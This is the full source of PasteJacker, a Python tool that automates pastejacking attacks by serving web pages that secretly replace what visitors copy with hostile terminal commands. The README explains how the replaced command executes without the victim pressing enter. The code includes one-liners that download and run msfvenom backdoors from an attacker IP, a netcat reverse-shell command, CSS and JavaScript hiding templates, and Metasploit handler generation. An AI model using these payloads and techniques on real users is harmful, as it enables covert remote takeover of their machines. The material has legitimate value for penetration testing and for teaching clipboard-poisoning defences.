├── .github └── FUNDING.yml ├── MANIFEST.in ├── PasteJacker ├── .gitignore ├── Core │ ├── Data │ │ └── version.txt │ ├── __init__.py │ ├── checkers.py │ ├── color.py │ ├── dictionaries.py │ ├── serve.py │ ├── settings.py │ ├── updater.py │ └── utils.py ├── Screenshots │ ├── p0.png │ ├── p1.png │ ├── p2.png │ └── p3.png ├── __init__.py ├── main.py └── templates │ ├── __init__.py │ ├── color_method.html │ ├── js_method.html │ └── style_method.html ├── README.md └── setup.py /.github/FUNDING.yml: -------------------------------------------------------------------------------- 1 | github: D4Vinci 2 | -------------------------------------------------------------------------------- /MANIFEST.in: -------------------------------------------------------------------------------- 1 | recursive-include PasteJacker/ * 2 | -------------------------------------------------------------------------------- /PasteJacker/.gitignore: -------------------------------------------------------------------------------- 1 | # Welcome to my gitignore file :') 2 | # Byte-compiled / optimized / DLL files 3 | __pycache__/ 4 | *.py[cod] 5 | *$py.class 6 | 7 | # Installer logs 8 | pip-log.txt 9 | pip-delete-this-directory.txt 10 | 11 | # pyenv 12 | .python-version 13 | 14 | # Environments 15 | .env 16 | .venv 17 | env/ 18 | venv/ 19 | ENV/ 20 | 21 | #log files 22 | *.log 23 | -------------------------------------------------------------------------------- /PasteJacker/Core/Data/version.txt: -------------------------------------------------------------------------------- 1 | 0.2 2 | -------------------------------------------------------------------------------- /PasteJacker/Core/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/D4Vinci/PasteJacker/85a29f9dc7f1f72bff697c0903eee062afabac67/PasteJacker/Core/__init__.py -------------------------------------------------------------------------------- 
/PasteJacker/Core/checkers.py: -------------------------------------------------------------------------------- 1 | import subprocess,os,socket 2 | 3 | def msfvenom(): 4 | cmd = subprocess.Popen("which msfvenom",shell=True,stdout=subprocess.PIPE,stderr=subprocess.PIPE) 5 | output,error=cmd.communicate() 6 | if error==output: 7 | return False 8 | return True 9 | 10 | def our_folder(): 11 | if not os.path.exists("/root/.pastejacker"): 12 | os.mkdir("/root/.pastejacker") 13 | 14 | def port_in_use(port): 15 | try: 16 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 17 | s.bind(("127.0.0.1", port)) 18 | s.close() 19 | return False # Port not in use 20 | except socket.error: 21 | s.close() 22 | return True # Port in use 23 | -------------------------------------------------------------------------------- /PasteJacker/Core/color.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | # Written by: Karim shoair - D4Vinci 3 | import os,sys 4 | global G, Y, B, R, W , M , C , end ,Bold,underline 5 | G,Y,B,R,W,M,C,end= '\033[92m','\033[93m','\033[94m','\033[91m','\x1b[37m','\x1b[35m','\x1b[36m','\033[0m' 6 | Bold = "\033[1m" 7 | underline = "\033[4m" 8 | 9 | def numbered(n,text,spaces=2): 10 | if "(" in text and ")" in text: 11 | text = text.split("(")[0] +end+R+Bold +"(" +text.split("(")[1] 12 | return( " "*spaces+Bold+W+"["+G+str(n)+W+"] "+G+text+end ) 13 | 14 | def colored_input(title="menu",spaces=3): 15 | spaces = " "*spaces 16 | print(G+spaces+"│") 17 | line = G+spaces+"└──["+R+"PasteJacker"+G+"]──["+R+"~"+G+"]─["+B+title+G+"]: "+end 18 | return input(line) 19 | 20 | def status(text): 21 | print( " "*2+C+"[+] "+Bold+G+text+end ) 22 | 23 | def error(text): 24 | print( " "*2+M+"[!] 
"+Bold+R+text+end ) 25 | -------------------------------------------------------------------------------- /PasteJacker/Core/dictionaries.py: -------------------------------------------------------------------------------- 1 | from . import settings, utils 2 | from .color import * 3 | import copy 4 | 5 | linux = { "Download and execute a msfvenom backdoor using wget (Web delivery + PasteJacking)":"wget http://{ip}:{port}/main.elf &> /dev/null && chmod +x ./main.elf && ./main.elf & disown", 6 | "Get me a simple reverse connection using netcat (Reverse connection + PasteJacking)":"nc -e /bin/sh {ip} {port} & disown", 7 | "Only serve my custom one-liner and do your PasteJacking thing! (PasteJacking only!)":None 8 | } 9 | windows = { "Download and execute a msfvenom backdoor using certutil (Web delivery + PasteJacking)":"certutil.exe -urlcache -split -f http://{ip}:{port}/main.exe main.exe 2>&1 && main.exe", 10 | "Only serve my custom one-liner and do your PasteJacking thing! (PasteJacking only!)":None 11 | } 12 | 13 | final_touches = { 14 | "Windows":"cls & {liner} & cls &", 15 | "Linux":"clear; {liner} && clear;" 16 | } 17 | 18 | escapes = { 19 | "Windows":[">NUL 2>&1 &","REM "], 20 | "Linux":["&>/dev/null;","#"] 21 | } 22 | 23 | metasploit_modules = { 24 | "Windows":[ 25 | "windows/meterpreter/reverse_tcp", 26 | "windows/meterpreter/reverse_http", 27 | "windows/meterpreter/reverse_https", 28 | "windows/shell/reverse_tcp"], 29 | "Linux":[ 30 | "linux/x86/meterpreter/reverse_tcp", 31 | "linux/x86/meterpreter_reverse_http", 32 | "linux/x86/meterpreter_reverse_https", 33 | "linux/x86/shell/reverse_tcp", 34 | "linux/x64/meterpreter/reverse_tcp", 35 | "linux/x64/meterpreter_reverse_http", 36 | "linux/x64/meterpreter_reverse_https", 37 | "linux/x64/shell/reverse_tcp" 38 | ] 39 | } 40 | 41 | # Was printing the advantages and disadvantages in the tool before but now no 42 | pastejacking = { 43 | "Using span style attribute to hide our lines.":{ 44 | 
"file":'style_method.html', 45 | "advantages":"Doesn't require javascript to be enabled. Works on all browsers.", 46 | "disadvantages":"Target must select all the text in the page or the first two words to ensure that he copies our hidden malicious lines." 47 | }, 48 | "Using javascript to hook the copy event and replace copied data.":{ 49 | "file":'js_method.html', 50 | "advantages":"Anything the user copies in the page will be replaced with our line. Command executed by itself once target paste it without pressing enter.", 51 | "disadvantages":"Requires javascript to be enabled on the target browser." 52 | }, 53 | "Using span style again but this time to make our text transparent and non-markable":{ 54 | "file":'color_method.html', 55 | "advantages":"Doesn't require javascript to be enabled.", 56 | "disadvantages":"Target must select all the text in the page to ensure that he copies our hidden malicious lines. Not working on opera and chrome." 57 | } 58 | } 59 | def save_os_type(choice): 60 | settings.os = { 61 | 1:"Windows", 62 | 2:"Linux" 63 | }[choice] 64 | 65 | def get_liners(keys_only=True): 66 | if keys_only: 67 | return list(linux.keys()) if settings.os == "Linux" else list(windows.keys()) 68 | else: 69 | return linux if settings.os == "Linux" else windows 70 | 71 | def set_liner(liner_choice): 72 | liners = get_liners(False) 73 | liners_keys = list( liners.keys() ) 74 | liner = liners_keys[int(liner_choice)-1] 75 | if "custom" in liner: 76 | while True: 77 | settings.liner=settings.final_liner=colored_input("Enter your one-liner",spaces=7) 78 | if settings.liner: 79 | break 80 | touches = final_touches[settings.os] 81 | settings.final_liner = touches.format(liner=settings.final_liner) 82 | return 0 83 | 84 | elif "netcat" in liner: 85 | ip,port = utils.ask_for_ip_port() 86 | settings.liner = liners[liner].format(ip=ip,port=port) 87 | prepare_liner(ip,port) 88 | return 1 89 | 90 | else: 91 | settings.liner = liners[liner] 92 | return 2 93 | 94 | def 
get_payloads(): 95 | return metasploit_modules[settings.os] 96 | 97 | def prepare_liner(ip,port): 98 | settings.final_liner = settings.liner.format(ip=ip,port=port) 99 | touches = final_touches[settings.os] 100 | settings.final_liner = touches.format(liner=settings.final_liner) 101 | 102 | def get_templates(): 103 | temp = copy.deepcopy(pastejacking) 104 | for template in temp: 105 | blah = temp[template].pop("file") 106 | return temp 107 | 108 | def set_template(templates_choice): 109 | templates_keys = list( pastejacking.keys() ) 110 | template = templates_keys[int(templates_choice)-1] 111 | settings.template = pastejacking[template]["file"] 112 | 113 | def get_escapes(): 114 | return escapes[settings.os] 115 | -------------------------------------------------------------------------------- /PasteJacker/Core/serve.py: -------------------------------------------------------------------------------- 1 | import os, socketserver, http.server, _thread as thread 2 | from jinja2 import Environment, PackageLoader, FileSystemLoader 3 | from . 
import utils 4 | global httpd, directory_before_serve 5 | httpd,directory_before_serve = [None]*2 6 | 7 | def render(template_name,*args,**kwargs): 8 | env = Environment(loader=FileSystemLoader(searchpath=utils.get_templates_dir())) 9 | template = env.get_template(template_name) 10 | return template.render(*args,**kwargs) 11 | 12 | def make_index(template_data): 13 | f = open("/root/.pastejacker/index.html","w") 14 | f.write(template_data) 15 | f.close() 16 | 17 | def start_web_server(directory,port=80): 18 | global httpd, directory_before_serve 19 | class ReusableTCPServer(socketserver.TCPServer): 20 | allow_reuse_address = True 21 | # specify the httpd service on 0.0.0.0 (all interfaces) on port 80 22 | httpd = ReusableTCPServer( ("0.0.0.0", port), http.server.SimpleHTTPRequestHandler) 23 | directory_before_serve = os.getcwd() 24 | os.chdir(directory) 25 | thread.start_new_thread(httpd.serve_forever, ()) 26 | 27 | def stop_web_server(): 28 | httpd.socket.close() 29 | os.chdir(directory_before_serve) 30 | -------------------------------------------------------------------------------- /PasteJacker/Core/settings.py: -------------------------------------------------------------------------------- 1 | global os, liner, final_liner, template, ip 2 | 3 | os = None 4 | liner = None 5 | final_liner = None 6 | template = None 7 | ip = None 8 | -------------------------------------------------------------------------------- /PasteJacker/Core/updater.py: -------------------------------------------------------------------------------- 1 | # -*- encoding: utf-8 -*- 2 | #Written by: Karim shoair - D4Vinci ( Cr3dOv3r ) 3 | from .color import * 4 | from . 
import utils 5 | from urllib.request import urlopen 6 | 7 | def check(): 8 | f = open( utils.add_corefilepath("Data","version.txt"), 'r') 9 | file_data = f.read().strip() 10 | try: 11 | version = urlopen('https://raw.githubusercontent.com/D4Vinci/PasteJacker/master/PasteJacker/Core/Data/version.txt').read().decode('utf-8').strip() 12 | except: 13 | error("Can't reach Internet !!!") 14 | sys.exit(0) 15 | 16 | if version != file_data: 17 | return file_data+R+" but new version is available!" 18 | else: 19 | return file_data 20 | -------------------------------------------------------------------------------- /PasteJacker/Core/utils.py: -------------------------------------------------------------------------------- 1 | # -*- encoding: utf-8 -*- 2 | #Written by: Karim shoair - D4Vinci ( Cr3dOv3r ) 3 | import os,time,subprocess,pkg_resources 4 | from . import updater 5 | from .color import * 6 | 7 | banner = """{G} 8 | /T /I 9 | / |/ | .-~/ 10 | T\ Y I |/ / _ 11 | /T | \I | I Y.-~/ 12 | I l /I T\ | | l | T / 13 | __ | \l \l \I l __l l \ ` _. | 14 | \ ~-l `\ `\ \ \\ ~\ \ `. .-~ | 15 | \ ~-. "-. ` \ ^._ ^. "-. / \ | 16 | .--~-._ ~- ` _ ~-_.-"-." ._ /._ ." ./ 17 | >--. ~-. ._ ~>-" "\\\ 7 7 ] 18 | ^.___~"--._ ~-( .-~ . `\ Y . / | 19 | <__ ~"-. ~ /_/ \ \I Y : | 20 | ^-.__ ~(_/ \ >._: | l______ 21 | ^--.,___.-~" /_/ ! `-.~"--l_ / ~"-. 22 | (_/ . ~( /' "~"--,Y -{W}=b{G}-. _) ______ _ ___ _ 23 | (_/ . \ : / l c"~o \\ | ___ \ | | |_ | | | 24 | \ / `. . .^ \_.-~"~--. ) | |_/ /_ _ ___| |_ ___ | | __ _ ___| | _____ _ __ 25 | (_/ . ` / / ! )/ | __/ _` / __| __/ _ \ | |/ _` |/ __| |/ / _ \ '__| 26 | / / _. '. .': / ' | | | (_| \__ \ || __/\__/ / (_| | (__| < __/ | 27 | ~(_/ . / _ ` .-<_ \_| \__,_|___/\__\___\____/ \__,_|\___|_|\_\___|_| 28 | /_/ . ' .-~" `. / \ \ ,z=. /─────────────────────────────────────────────────────\\ 29 | ~( / ' : | K "-.~-.______// {W}[{Y}=>{W}] PasteJacking attacks automation with a style. [{Y}<={W}]{G} 30 | "-,. l I/ \_ __(--->._(==. 
{W}[{Y}=>{W}] {B}Created by: {R}Karim Shoair (D4Vinci) {W}[{Y}<={W}]{G} 31 | //( \ < ~"~" // {W}[{Y}=>{W}] {B}Version: {R}{version} {W}[{Y}<={W}]{G} 32 | /' /\ \ \ ,v=. (( {W}[{Y}=>{W}] {B}Codename:{R} Hijack {W}[{Y}<={W}]{G} 33 | .^. / /\ " )__ //===- ` {W}[{Y}=>{W}] {B}Follow me on Twitter: {R}@D4Vinci1 {W}[{Y}<={W}]{G} 34 | / / ' ' "-.,__ (---(==- {W}[{Y}=>{W}] [{Y}<={W}]{G} 35 | .^ ' : T ~" ll {W}[{Y}=>{W}] CHOOSE A TARGET TO BEGIN [{Y}<={W}]{G} 36 | / . . . : | :! \\ \_____________________________________________________/ 37 | (_/ / | | j-" ~^ 38 | ~-<_(_.^-~" 39 | """ 40 | core_dir = pkg_resources.resource_filename('PasteJacker', 'Core') 41 | templates_dir = pkg_resources.resource_filename('PasteJacker', 'templates') 42 | 43 | def add_corefilepath(*args): 44 | return os.path.join(core_dir, *args) 45 | 46 | 47 | def get_templates_dir(): 48 | return templates_dir 49 | 50 | def print_banner(): 51 | os.system("clear") 52 | version = updater.check() 53 | banner_to_print = Bold + banner.format(version=version,Y=Y,B=B,W=W,R=R,G=G) + end 54 | print(banner_to_print) 55 | 56 | def validate_input(num, choices): 57 | try: 58 | num = int(num) 59 | except: 60 | error("Please enter a valid integer!") 61 | time.sleep(0.5) 62 | return False 63 | else: 64 | exit_choice = choices[-1] 65 | if num == exit_choice: 66 | return -1 67 | elif num not in list( range(*choices) ): 68 | error("Please enter a valid choice!") 69 | time.sleep(0.5) 70 | return False 71 | else: 72 | return True 73 | 74 | def print_choices(choices, spaces=None): 75 | if spaces: 76 | print(" "*(spaces+1)+G+"│") 77 | final_choice = "Back" if spaces else "Exit" 78 | for n,line in enumerate([*choices,final_choice]): 79 | current_range = n+1 80 | print( numbered(n+1,line,spaces if spaces else 2) ) 81 | return current_range 82 | 83 | def ask_for_ip_port(spaces=10): 84 | while True: 85 | ip = colored_input("IP to connect back to",spaces) 86 | if not ip: 87 | continue 88 | port = colored_input("Connection port 
(1337)",spaces) or '1337' 89 | break 90 | return ip,port 91 | 92 | def ask_for_text(): 93 | text = "" 94 | status("Enter the text you want user to see "+B+"(Press enter twice to finish...)") 95 | while True: 96 | line = input(G+" >>> "+end) 97 | if not line: 98 | break 99 | else: 100 | text = text +line+ "
" 101 | return (text or " ") 102 | 103 | def write_resource(payload,ip,port): 104 | data = """use multi/handler 105 | set payload {payload} 106 | set lhost {ip} 107 | set lport {port} 108 | set exitonsession false 109 | exploit -j""" 110 | resource = data.format(**locals()) 111 | f = open("/root/.pastejacker/msf_handler.rc","w") 112 | f.write(resource) 113 | f.close() 114 | 115 | def execute(command): 116 | cmd = subprocess.Popen(command,shell=True,stdout=subprocess.PIPE,stderr=subprocess.PIPE) 117 | output,error=cmd.communicate() 118 | if error==output: 119 | return False 120 | return True 121 | -------------------------------------------------------------------------------- /PasteJacker/Screenshots/p0.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/D4Vinci/PasteJacker/85a29f9dc7f1f72bff697c0903eee062afabac67/PasteJacker/Screenshots/p0.png -------------------------------------------------------------------------------- /PasteJacker/Screenshots/p1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/D4Vinci/PasteJacker/85a29f9dc7f1f72bff697c0903eee062afabac67/PasteJacker/Screenshots/p1.png -------------------------------------------------------------------------------- /PasteJacker/Screenshots/p2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/D4Vinci/PasteJacker/85a29f9dc7f1f72bff697c0903eee062afabac67/PasteJacker/Screenshots/p2.png -------------------------------------------------------------------------------- /PasteJacker/Screenshots/p3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/D4Vinci/PasteJacker/85a29f9dc7f1f72bff697c0903eee062afabac67/PasteJacker/Screenshots/p3.png -------------------------------------------------------------------------------- /PasteJacker/__init__.py: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/D4Vinci/PasteJacker/85a29f9dc7f1f72bff697c0903eee062afabac67/PasteJacker/__init__.py -------------------------------------------------------------------------------- /PasteJacker/main.py: -------------------------------------------------------------------------------- 1 | #-*- coding: utf-8 -*- 2 | # Written by: Karim shoair - D4Vinci 3 | # PasteJacker toolkit 4 | import os,sys,time,readline 5 | from .Core.color import * 6 | from .Core import utils,checkers,serve 7 | from .Core.dictionaries import * 8 | 9 | def menu(): 10 | if os.name=="nt": 11 | print("Sorry, but this tool requires a lot of things that's not on windows!") 12 | sys.exit(0) 13 | 14 | elif os.geteuid()!=0: 15 | print("Sorry, but this tool needs to be executed as root!") 16 | sys.exit(0) 17 | 18 | utils.print_banner() 19 | current_range = utils.print_choices(["Windows","Linux"]) 20 | os_type = colored_input() 21 | valid_input = utils.validate_input(os_type, (1,current_range)) 22 | if valid_input==-1: 23 | sys.exit(0) 24 | elif not valid_input: 25 | menu() 26 | else: 27 | checkers.our_folder() 28 | save_os_type( int(os_type) ) 29 | choose_liner_menu() 30 | 31 | def choose_liner_menu(): 32 | methods = get_liners() 33 | while True: 34 | current_range = utils.print_choices(methods, spaces=6) 35 | delivery_method = colored_input("What to do with target",spaces=7) 36 | valid_input = utils.validate_input(delivery_method, (1,current_range)) 37 | if valid_input==-1: 38 | menu() 39 | break 40 | elif valid_input: 41 | temp = set_liner(delivery_method) 42 | if temp in (0,1): 43 | template_menu() 44 | elif temp==2: 45 | metasploit_payloads_menu() 46 | break 47 | 48 | def template_menu(): 49 | templates = get_templates() 50 | templates_to_print = [] 51 | for template in templates: 52 | line = template 53 | #line += end+B+"\t\t\tAdvantages : "+end+G+templates[template]["advantages"]+"\n" 54 | #line += 
B+"\t\t\tDisadvantages : "+end+G+templates[template]["disadvantages"]+"\n" 55 | templates_to_print.append(line) 56 | while True: 57 | current_range = utils.print_choices(templates_to_print, spaces=14) 58 | template = colored_input("Choose template",spaces=15) 59 | valid_input = utils.validate_input(template, (1,current_range)) 60 | if valid_input==-1: 61 | choose_liner_menu() 62 | break 63 | elif valid_input: 64 | set_template(template) 65 | serve_menu() 66 | break 67 | 68 | 69 | def metasploit_payloads_menu(): 70 | while True: 71 | payloads = get_payloads() 72 | current_range = utils.print_choices(payloads, spaces=10) 73 | payload = colored_input("Metasploit payload to use in generating",spaces=11) 74 | valid_input = utils.validate_input(payload, (1,current_range)) 75 | if valid_input==-1: 76 | choose_liner_menu() 77 | break 78 | else: 79 | ip,port = utils.ask_for_ip_port(spaces=15) # This will be for the msfvenom backdoor so I will ask him for another port for serving 80 | payload = payloads[int(payload)-1] 81 | settings.ip = ip 82 | generation(payload, ip, port) 83 | break 84 | 85 | def generation(payload,ip,port): 86 | if not checkers.msfvenom(): 87 | error("Can't generate a payload as msfvenom is not installed! 
(Or can't detect it)") 88 | time.sleep(1) 89 | menu() 90 | else: 91 | f = "elf" if "linux" in payload else "exe" 92 | c = utils.execute("msfvenom -p "+payload+" LHOST=" + ip + " LPORT=" + str(port) + " -f "+f+" >/root/.pastejacker/main."+f) 93 | if not c: 94 | error("Failed to generate msfvenom backdoor!") 95 | sys.exit(1) 96 | else: 97 | status("MSFVenom backdoor saved as "+M+" /root/.pastejacker/main."+f+end) 98 | utils.write_resource(payload,ip,port) 99 | status("Metasploit resource file saved as "+M+" /root/.pastejacker/msf_handler.rc"+end) 100 | template_menu() 101 | 102 | def serve_menu(): 103 | while True: 104 | port = colored_input("Port to serve on (80)",spaces=18) or 80 105 | try: 106 | port = int(port) 107 | except: 108 | error("Please enter a valid port!") 109 | time.sleep(1) 110 | continue 111 | else: 112 | if checkers.port_in_use(port): 113 | error("Port "+B+str(port)+R+" is already in use, kill the running service or choose another port!") 114 | continue 115 | if not settings.final_liner: 116 | prepare_liner(settings.ip,port) 117 | msg = utils.ask_for_text() 118 | b,c = msg.split(" ")[0], " ".join(msg.split(" ")[1:]) 119 | final_serve(port, b, c, get_escapes()) 120 | break 121 | 122 | def final_serve(port,b,c,escape): 123 | status("Now let's start serving...") 124 | esc1,esc2=escape 125 | if settings.template=="js_method.html": # To escape the quotes 126 | settings.final_liner = settings.final_liner.replace("'","\\'") 127 | data = serve.render(settings.template, payload=settings.final_liner, fake_p1=b, fake_p2=" "+c+"\r\n", escape_p1=esc1, escape_p2=esc2) 128 | serve.make_index(data) 129 | serve.start_web_server("/root/.pastejacker/",port) 130 | status("Serving on port "+R+str(port)) 131 | print(G+"-"*30+end) 132 | while True: 133 | try: 134 | time.sleep(1) 135 | continue 136 | except KeyboardInterrupt: 137 | serve.stop_web_server() 138 | print("") 139 | status("Webserver stopped!") 140 | break 141 | 
-------------------------------------------------------------------------------- /PasteJacker/templates/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/D4Vinci/PasteJacker/85a29f9dc7f1f72bff697c0903eee062afabac67/PasteJacker/templates/__init__.py -------------------------------------------------------------------------------- /PasteJacker/templates/color_method.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | {{fake_p1 | safe}} 4 | {{escape_p1}} {{payload}} {{escape_p2}} 5 | {{fake_p2 | safe}} 6 | 7 | 8 | 9 | 10 | -------------------------------------------------------------------------------- /PasteJacker/templates/js_method.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | {{fake_p1 | safe}} {{fake_p2 | safe}} 4 | 11 | 12 | 13 | 14 | -------------------------------------------------------------------------------- /PasteJacker/templates/style_method.html: -------------------------------------------------------------------------------- 1 | 2 | 3 |

{{fake_p1 | safe}} 4 | 5 | {{escape_p1}} {{payload}} {{escape_p2}} 6 | 7 | {{fake_p2 | safe}} 8 |

9 | 10 | 11 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # PasteJacker [![Python 3.5](https://img.shields.io/badge/Python-3.0+-yellow.svg)](http://www.python.org/download/) ![Version](https://img.shields.io/badge/Version-0.2-red.svg) 2 | 3 | The main purpose of the tool is automating the (PasteJacking/Clipboard poisoning/whatever you name it) attack by collecting all the known tricks used in this attack in one place and one automated job, as after searching I found there's no tool doing this job the right way :smile: 4 | 5 | Now because this attack depends on what the user will paste, I implemented the Metasploit web-delivery module's idea into the tool so when the user pastes into the terminal, you get a meterpreter session on his device :smile: 6 | 7 | [Watch tutorial on youtube](https://www.youtube.com/watch?v=FfMoCPVjF5Y) 8 | ### What's PasteJacking ? 9 | In short, Pastejacking is a method that malicious websites employ to take control of your computers’ clipboard and change its content to something harmful without your knowledge. *[From The Windows club definition](https://www.thewindowsclub.com/what-is-pastejacking)* 10 | 11 | So what I did here is automate the original attack and add two other tricks to fool the user, using HTML and CSS *Will talk about it*, then add meterpreter sessions as I said before. 12 | 13 | ### A simple scenario to make things clear: 14 | 1. The target opens an HTML page served by the tool and this page has anything that makes the user want to copy from it and paste into the terminal. *Ex: package installation instructions* 15 | 2. The target copies anything from the page, then in the background it gets replaced quickly with our liner. 16 | 3. 
The user pastes into the terminal and before he notices that the line he copied has been changed : 17 | - The line gets executed by itself in the background (Without pressing enter) 18 | - The terminal gets cleared. 19 | - The user sees the terminal is usable again. 20 | - You already got your meterpreter session by this time. 21 | 4. All of that happened in less than a second and maybe the user thinks this is a bad program and he won't install it :smile: 22 | 23 | ### This tool uses 3 methods to trick the user into copying our payload instead of the command he copies: 24 | + **Using javascript to hook the copy event and replace copied data.** 25 | - Advantages : 26 | 1. Anything the user copies in the page will be replaced with our line. 27 | 2. The command is executed by itself once the target pastes it, without pressing enter. 28 | - Disadvantages : 29 | 1. Requires Javascript to be enabled on the target browser. 30 | 31 | 32 | + **Using span style attribute to hide our lines by overwriting.** 33 | - Advantages : 34 | 1. Doesn't require javascript to be enabled. 35 | 2. Works on all browsers. 36 | - Disadvantages : 37 | 1. Target must select all the text in the page or the first two words to ensure that he copies our hidden malicious lines. 38 | 39 | 40 | + **Using span style again but this time to make our text transparent and non-markable.** 41 | - Advantages : 42 | 1. Doesn't require javascript to be enabled. 43 | - Disadvantages : 44 | 1. Target must select all the text in the page to ensure that he copies our hidden malicious lines. 45 | 2. Does not work on Opera and Chrome. 46 | 47 | ##### What's the payload the user copies ? 48 | PasteJacker gives you the option to do one of these things: 49 | 1. Generate a msfvenom backdoor on our machine and the liner the target is gonna copy will download the backdoor to its machine, through wget or certutil depending on the OS, then execute it in the background without printing anything to the terminal. 50 | 2. 
Serve a liner that gets you a reverse netcat connection on the target machine, running in the background of course. 51 | 3. Serve your **custom** liner, like a Metasploit web-delivery payload, with some added touches to hide any possible output. 52 | 53 | # Screenshots (Not updated) 54 | 55 | 56 | 57 | 58 | 59 | 60 | ## Installing and requirements 61 | - Python 3 and setuptools module. 62 | - Linux or Unix-based system (Currently tested only on Kali Linux rolling and Ubuntu 16.04). 63 | - Third-party requirements like msfvenom but only if you are gonna use the msfvenom option, of course. 64 | - Third-party library ncurses-dev for Ubuntu (Thanks to @mhaskar). 65 | - Root access. 66 | 67 | ### Installing 68 | 69 | + **For Linux :** 70 | ``` 71 | git clone https://github.com/D4Vinci/PasteJacker.git 72 | sudo python3 -m pip install ./PasteJacker 73 | sudo pastejacker 74 | ``` 75 | 76 | ## Updating the framework or the database 77 | - On Linux while you are outside the directory 78 | ``` 79 | cd PasteJacker && git pull && cd .. 80 | sudo python3 -m pip install ./PasteJacker --upgrade 81 | ``` 82 | 83 | ## References 84 | 85 | - [PasteJacking GitHub repo](https://github.com/dxa4481/Pastejacking) 86 | - [Clipboard poisoning attacks on the Mac - Malwarebytes ](https://blog.malwarebytes.com/threat-analysis/2016/05/clipboard-poisoning-attacks-on-the-mac/) 87 | - [Metasploit web-delivery module's source and idea ](https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/script/web_delivery.rb) 88 | 89 | ## Contact 90 | - [Twitter](https://twitter.com/D4Vinci1) 91 | 92 | ## Donation 93 | If this tool has been useful for you, feel free to thank me by buying me a coffee or more ;) 94 | 95 | [![Coffee](https://www.buymeacoffee.com/assets/img/custom_images/orange_img.png)](https://buymeacoffee.com/d4vinci) 96 | 97 | ## Disclaimer 98 | PasteJacker is created to help in penetration testing and it's not responsible for any misuse or illegal purposes. 
99 | 100 | Copying a code from this tool or using it in another tool is accepted as you mention where you get it from :smile:. 101 | 102 | > Pull requests are always welcomed :D 103 | -------------------------------------------------------------------------------- /setup.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | import os 4 | from setuptools import setup, find_packages 5 | 6 | with open(os.path.join('PasteJacker', 'Core', 'Data', 'version.txt')) as f: 7 | version = f.read().strip() 8 | 9 | with open('README.md') as f: 10 | des = f.read().strip() 11 | 12 | setup(name='PasteJacker', 13 | version=version, 14 | author = "Karim Shoair (D4Vinci)", 15 | description='Hacking systems with the automation of PasteJacking attacks.', 16 | long_description=des, 17 | url='https://github.com/D4Vinci/PasteJacker', 18 | packages=find_packages(exclude=['ez_setup', 'examples', 'tests']), 19 | include_package_data=True, 20 | install_requires=[ 21 | 'Jinja2', 22 | 'readline;platform_system!="Windows"', 23 | 'gnureadline;platform_system!="Windows"' 24 | ], 25 | entry_points={ 26 | 'console_scripts': [ 27 | 'pastejacker = PasteJacker.main:menu', 28 | ], 29 | }, 30 | ) 31 | --------------------------------------------------------------------------------